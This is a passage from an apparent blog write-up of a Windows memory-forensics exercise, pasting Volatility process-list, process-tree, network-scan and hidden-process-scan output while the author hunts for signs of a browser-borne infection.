1284    880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A     Disabled
2748    880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
2672    2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
5052    740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A     Disabled
5124    2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5200    2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5228    5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
5396    5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5404    5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5424    5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
5896    880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A     Disabled
4984    880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A     Disabled
4092    740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A     Disabled
6108    1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A     Disabled
3780    740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
6012    740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
5916    880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
604     740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
6264    740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A     Disabled
6420    880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A     Disabled
6716    880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A     Disabled
6840    880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A     Disabled
928     5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000      Disabled
5944    880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A     Disabled
3880    5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
1052    5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
6936    4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
4768    4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
6884    5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A     Disabled
6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A     Disabled
5736    2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A     Disabled
6016    5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A     Disabled
2248    788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A     Disabled

Nothing is immediately obvious as out of place to me, so next I decided to run `` to see if there are any processes spawned in a place they shouldn't be:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A
* 408   4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A
* 1684  4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A
* 124   4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A
* 504   696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A
** 592  504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A
*** 916 592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A
*** 740 592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1028       740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A
***** 3184      1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A
***** 2620      1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A
****** 2976     2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A
******* 3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A
******* 788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A
******** 2248   788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A
****** 2992     2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A
******* 3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A
******* 6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A
***** 3932      1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A
**** 1924       740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 2052       740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 4104       740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A
**** 1932       740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 1168       740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1428       740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 1816       740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A
***** 6108      1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A
**** 6012       740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A
**** 1592       740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A
***** 3132      1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A
**** 2232       740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 1212       740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 5052       740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A
**** 1220       740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 3780       740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A
**** 4172       740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A
***** 6936      4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A
***** 4768      4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A
**** 2256       740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A
**** 3924       740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A
**** 1240       740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A
**** 604        740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A
**** 2784       740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A
**** 3424       740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A
**** 1892       740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 2788       740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A
**** 1004       740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A
**** 4092       740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A
**** 880        740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A
***** 4608      880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A
***** 4800      880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A
***** 4484      880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A
***** 1284      880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A
***** 5916      880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A
***** 4328      880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A
***** 5896      880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A
***** 3468      880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A
***** 6840      880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A
***** 5944      880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A
***** 6420      880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A
***** 4984      880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A
***** 2748      880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A
***** 6716      880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A
**** 1652       740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A
**** 3316       740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A
**** 6264       740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A
**** 1916       740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A
*** 748 592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A
** 516  504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A
* 908   696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A
* 3420  696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000
** 2952 3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A
*** 2672        2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A
*** 5736        2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A
*** 5200        2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A
**** 928        5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000
**** 6016       5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A
**** 6884       5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A
**** 3880       5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A
**** 5228       5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A
**** 1052       5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A
**** 5424       5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A
**** 5396       5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A
**** 5404       5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A
*** 5124        2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A

Again, nothing obviously shady, but we see several instances of MS Edge running, which the description hinted may have been the initial source of the infection. Let's take a look at the network connections with netscan to see if there's anything shady there:

Offset  Proto   LocalAddr       LocalPort       ForeignAddr     ForeignPort     State   PID     Owner   Created

0xad81e44e0320  TCPv4       49830  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:17.000000
0xad81e832d010  TCPv4       49828  80      ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:09.000000
0xad81e880e1b0  TCPv4 49667 0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880e1b0  TCPv6   ::      49667   ::      0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880e470  TCPv4 49666 0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e5d0  TCPv4 135 0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e5d0  TCPv6   ::      135     ::      0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e730  TCPv4 49666 0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e730  TCPv6   ::      49666   ::      0       LISTENING       1028    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880e890  TCPv4 49664 0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880ee10  TCPv4 49668 0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880ee10  TCPv6   ::      49668   ::      0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880f0d0  TCPv4 49667 0       LISTENING       1652    spoolsv.exe     2023-06-13 12:32:33.000000
0xad81e880f230  TCPv4 49664 0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880f230  TCPv6   ::      49664   ::      0       LISTENING       748     lsass.exe       2023-06-13 22:32:31.000000
0xad81e880f4f0  TCPv4 49665 0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81e880f650  TCPv4 445 0       LISTENING       4       System  2023-06-13 12:32:34.000000
0xad81e880f650  TCPv6   ::      445     ::      0       LISTENING       4       System  2023-06-13 12:32:34.000000
0xad81e880f7b0  TCPv4 135 0       LISTENING       1004    svchost.exe     2023-06-13 22:32:31.000000
0xad81e880f910  TCPv4 49668 0       LISTENING       740     services.exe    2023-06-13 12:32:34.000000
0xad81e880fe90  TCPv4 49665 0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81e880fe90  TCPv6   ::      49665   ::      0       LISTENING       592     wininit.exe     2023-06-13 22:32:31.000000
0xad81ea0efb50  TCPv4       49682    443     CLOSED  2256    MsMpEng.exe     2023-06-13 12:33:59.000000
0xad81ea1c7b50  TCPv4       139 0       LISTENING       4       System  2023-06-13 12:32:35.000000
0xad81ea1c80d0  TCPv4 7680 0       LISTENING       3780    svchost.exe     2023-06-13 12:34:34.000000
0xad81ea1c80d0  TCPv6   ::      7680    ::      0       LISTENING       3780    svchost.exe     2023-06-13 12:34:34.000000
0xad81ea5c0010  TCPv4       49815  80      ESTABLISHED     1916    svchost.exe     2023-06-13 12:35:41.000000
0xad81eafc24a0  TCPv4       49829  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:36:09.000000
0xad81ebec9b20  UDPv4 5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ebec9b20  UDPv6   ::      5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ebf0e3e0  UDPv4       55881   *       0               1028    svchost.exe     2023-06-13 12:32:34.000000
0xad81ec10c1d0  UDPv4 58418   *       0               4484    RuntimeBroker.  2023-06-13 12:36:13.000000
0xad81ec25b650  UDPv4 0       *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25b650  UDPv6   ::      0       *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25e210  UDPv4 5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25e3a0  UDPv4 5355    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25eb70  UDPv4       137     *       0               4       System  2023-06-13 12:32:35.000000
0xad81ec25f1b0  UDPv4       138     *       0               4       System  2023-06-13 12:32:35.000000
0xad81ec25f980  UDPv4 5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec25f980  UDPv6   ::      5353    *       0               1916    svchost.exe     2023-06-13 12:32:35.000000
0xad81ec9709d0  UDPv4 54702   *       0               4484    RuntimeBroker.  2023-06-13 12:36:01.000000
0xad81ec975b10  UDPv4 53028   *       0               5404    msedge.exe      2023-06-13 12:36:01.000000
0xad81ec97bbf0  UDPv4 52187   *       0               5404    msedge.exe      2023-06-13 12:36:01.000000
0xad81ec990a50  UDPv4 56357   *       0               5404    msedge.exe      2023-06-13 12:35:26.000000
0xad81ecee44a0  TCPv4       49793  443     ESTABLISHED     5404    msedge.exe      2023-06-13 12:35:26.000000
0xad81ed3b6930  TCPv4       49817  80      ESTABLISHED     2748    smartscreen.ex  2023-06-13 12:35:56.000000
0xad81ed48c0c0  UDPv4 5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000
0xad81ed48c250  UDPv4 58109   *       0               4484    RuntimeBroker.  2023-06-13 12:36:18.000000
0xad81ed490260  UDPv4 5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000
0xad81ed490260  UDPv6   ::      5353    *       0               5200    msedge.exe      2023-06-13 12:36:09.000000

I saw a handful of external IP addresses, so I visited each of them to see if there was anything immediately suspicious about them:

  • an opendir of /videolan/
  • a 404 page, belongs to the Edgecast CDN
  • invalid URL page; belongs to Akamai
  • 404 page, Edgecast CDN
  • "CRL/CACERT Repository" page, belongs to Edgecast
  • failed to connect
  • service unavailable page, belongs to Microsoft

Unfortunately all the DNS requests in our capture are to local IP, so these external IPs don't give us a smoking gun. Using a tip from CQURE I tried windows.psscan.PsScan next to see if there were any hidden processes running on the system:

PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime        File output

4       0       System  0xad81e4479040  152     -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
124     4       Registry        0xad81e45d0040  4       -       N/A     False   2023-06-13 22:32:23.000000      N/A     Disabled
5736    2952    vlc.exe 0xad81e832c080  5       -       1       False   2023-06-13 12:35:57.000000      N/A     Disabled
4984    880     WmiPrvSE.exe    0xad81e856c2c0  9       -       0       False   2023-06-13 12:33:53.000000      N/A     Disabled
516     504     csrss.exe       0xad81e860c080  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
408     4       smss.exe        0xad81e889e040  2       -       N/A     False   2023-06-13 22:32:27.000000      N/A     Disabled
2248    788     mscorsvw.exe    0xad81ea1d8080  10      -       0       True    2023-06-13 12:36:13.000000      N/A     Disabled
2672    2952    SecurityHealth  0xad81ea2ec340  5       -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
5124    2952    VBoxTray.exe    0xad81ea2ee080  13      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6936    4172    SearchProtocol  0xad81ea5b8080  11      -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled
4092    740     svchost.exe     0xad81ea5ba2c0  3       -       0       False   2023-06-13 12:33:54.000000      N/A     Disabled
5228    5200    msedge.exe      0xad81ea62b0c0  9       -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6264    740     svchost.exe     0xad81ea62e240  6       -       0       False   2023-06-13 12:34:38.000000      N/A     Disabled
5404    5200    msedge.exe      0xad81ea69a0c0  17      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
6840    880     RuntimeBroker.  0xad81ea6d6300  6       -       1       False   2023-06-13 12:34:57.000000      N/A     Disabled
3780    740     svchost.exe     0xad81ea6e70c0  8       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
5944    880     TextInputHost.  0xad81ea7b2300  12      -       1       False   2023-06-13 12:35:17.000000      N/A     Disabled
5396    5200    msedge.exe      0xad81ea7c70c0  21      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
604     740     svchost.exe     0xad81ea8aa080  15      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
5916    880     MoUsoCoreWorke  0xad81ea8ac080  12      -       0       False   2023-06-13 12:34:35.000000      N/A     Disabled
1284    880     RuntimeBroker.  0xad81ea9a2080  8       -       1       False   2023-06-13 12:33:05.000000      N/A     Disabled
2748    880     smartscreen.ex  0xad81ea9a4080  15      -       1       False   2023-06-13 12:33:07.000000      N/A     Disabled
1052    5200    msedge.exe      0xad81eaa1f080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
6612    2992    ngen.exe        0xad81eaa26080  4       -       0       False   2023-06-13 12:35:55.000000      N/A     Disabled
3880    5200    msedge.exe      0xad81eaa29080  16      -       1       False   2023-06-13 12:35:24.000000      N/A     Disabled
5052    740     SecurityHealth  0xad81eaaf6080  27      -       0       False   2023-06-13 12:33:07.000000      N/A     Disabled
3468    880     TiWorker.exe    0xad81eac45080  2       -       0       False   2023-06-13 12:32:38.000000      N/A     Disabled
740     592     services.exe    0xad81ead23080  6       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
592     504     wininit.exe     0xad81ead2a080  2       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
616     584     csrss.exe       0xad81ead340c0  12      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
696     584     winlogon.exe    0xad81ead66080  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
748     592     lsass.exe       0xad81ead81300  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
880     740     svchost.exe     0xad81eade9240  18      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
916     592     fontdrvhost.ex  0xad81eae1a140  5       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
908     696     fontdrvhost.ex  0xad81eae1c140  5       -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1004    740     svchost.exe     0xad81eaeab2c0  9       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
6420    880     WmiPrvSE.exe    0xad81eaf08080  5       -       0       False   2023-06-13 12:34:44.000000      N/A     Disabled
504     696     dwm.exe 0xad81eaf0a080  22      -       1       False   2023-06-13 22:32:31.000000      N/A     Disabled
1028    740     svchost.exe     0xad81eaf68240  57      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1168    740     upfc.exe        0xad81eafc0080  1       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1212    740     svchost.exe     0xad81eafcc2c0  16      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1220    740     svchost.exe     0xad81eafd92c0  8       -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1240    740     svchost.exe     0xad81eafdc2c0  13      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1428    740     VBoxService.ex  0xad81ebc7a240  11      -       0       False   2023-06-13 22:32:31.000000      N/A     Disabled
1592    740     svchost.exe     0xad81ebcee280  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1892    740     svchost.exe     0xad81ebd0b080  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1684    4       MemCompression  0xad81ebd0e040  42      -       N/A     False   2023-06-13 12:32:33.000000      N/A     Disabled
6012    740     SgrmBroker.exe  0xad81ebd39080  7       -       0       False   2023-06-13 12:34:34.000000      N/A     Disabled
3316    740     svchost.exe     0xad81ebd3a080  3       -       1       False   2023-06-13 12:32:48.000000      N/A     Disabled
2952    3420    explorer.exe    0xad81ebd3b300  65      -       1       False   2023-06-13 12:32:46.000000      N/A     Disabled
1816    740     svchost.exe     0xad81ebdee0c0  11      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1916    740     svchost.exe     0xad81ebdf22c0  16      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1932    740     svchost.exe     0xad81ebdf42c0  3       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1924    740     svchost.exe     0xad81ebdf62c0  4       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
1652    740     spoolsv.exe     0xad81ebdfa0c0  8       -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2052    740     svchost.exe     0xad81ebe970c0  13      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2232    740     svchost.exe     0xad81ebea2080  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2256    740     MsMpEng.exe     0xad81ebf92340  12      -       0       False   2023-06-13 12:32:33.000000      N/A     Disabled
2620    1028    taskhostw.exe   0xad81ec0b02c0  6       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
6108    1816    audiodg.exe     0xad81ec0c9080  4       -       0       False   2023-06-13 12:33:57.000000      N/A     Disabled
2788    740     svchost.exe     0xad81ec12a240  24      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2976    2620    ngentask.exe    0xad81ec1d6300  5       -       0       True    2023-06-13 12:32:34.000000      N/A     Disabled
2992    2620    ngentask.exe    0xad81ec1e1340  12      -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3000    2992    conhost.exe     0xad81ec1e2080  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
3032    2976    conhost.exe     0xad81ec1ef200  4       -       0       False   2023-06-13 12:32:34.000000      N/A     Disabled
2784    740     svchost.exe     0xad81ec2f3080  6       -       0       False   2023-06-13 12:32:35.000000      N/A     Disabled
788     2976    ngen.exe        0xad81ec3e3080  6       -       0       True    2023-06-13 12:32:35.000000      N/A     Disabled
4172    740     SearchIndexer.  0xad81ec4cf080  16      -       0       False   2023-06-13 12:32:53.000000      N/A     Disabled
3424    740     TrustedInstall  0xad81ec4d0080  3       -       0       False   2023-06-13 12:32:37.000000      N/A     Disabled
3420    696     userinit.exe    0xad81ec59d300  0       -       1       False   2023-06-13 12:32:46.000000      2023-06-13 12:33:15.000000      Disabled
4328    880     StartMenuExper  0xad81ec5bb080  6       -       1       False   2023-06-13 12:32:54.000000      N/A     Disabled
6716    880     ShellExperienc  0xad81ec5be080  17      -       1       False   2023-06-13 12:34:56.000000      N/A     Disabled
3924    740     svchost.exe     0xad81ec6782c0  7       -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3932    1028    sihost.exe      0xad81ec679080  12      -       1       False   2023-06-13 12:32:43.000000      N/A     Disabled
3132    1592    ctfmon.exe      0xad81ec754240  12      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
3184    1028    taskhostw.exe   0xad81ec75d080  10      -       1       False   2023-06-13 12:32:44.000000      N/A     Disabled
4104    740     svchost.exe     0xad81ecaa2080  3       -       0       False   2023-06-13 12:32:50.000000      N/A     Disabled
5896    880     ApplicationFra  0xad81ecaa4080  3       -       1       False   2023-06-13 12:33:52.000000      N/A     Disabled
4608    880     SearchApp.exe   0xad81ecdcd080  32      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
4484    880     RuntimeBroker.  0xad81ecdce2c0  13      -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
6884    5200    msedge.exe      0xad81ece6f080  14      -       1       False   2023-06-13 12:35:30.000000      N/A     Disabled
5424    5200    msedge.exe      0xad81ecec90c0  11      -       1       False   2023-06-13 12:33:09.000000      N/A     Disabled
928     5200    msedge.exe      0xad81ecfab340  0       -       1       False   2023-06-13 12:35:16.000000      2023-06-13 12:35:44.000000      Disabled
4800    880     RuntimeBroker.  0xad81ed0ec2c0  6       -       1       False   2023-06-13 12:32:55.000000      N/A     Disabled
5200    2952    msedge.exe      0xad81ed0f8080  54      -       1       False   2023-06-13 12:33:08.000000      N/A     Disabled
6016    5200    msedge.exe      0xad81ed0fa080  20      -       1       False   2023-06-13 12:36:00.000000      N/A     Disabled
4768    4172    SearchFilterHo  0xad81ed3cf340  6       -       0       False   2023-06-13 12:35:29.000000      N/A     Disabled

But again, no such luck. I then generated a DLL list with dlllist > dlllist.log here, but unfortunately I don't yet know enough about Windows DLLs to know what to look for here. We were able to find some stuff that looks interesting with windows.cmdline.CmdLine:

PID     Process Args

4       System  Required memory at 0x20 is not valid (process exited?)
124     Registry        Required memory at 0x20 is not valid (process exited?)
408     smss.exe        \SystemRoot\System32\smss.exe
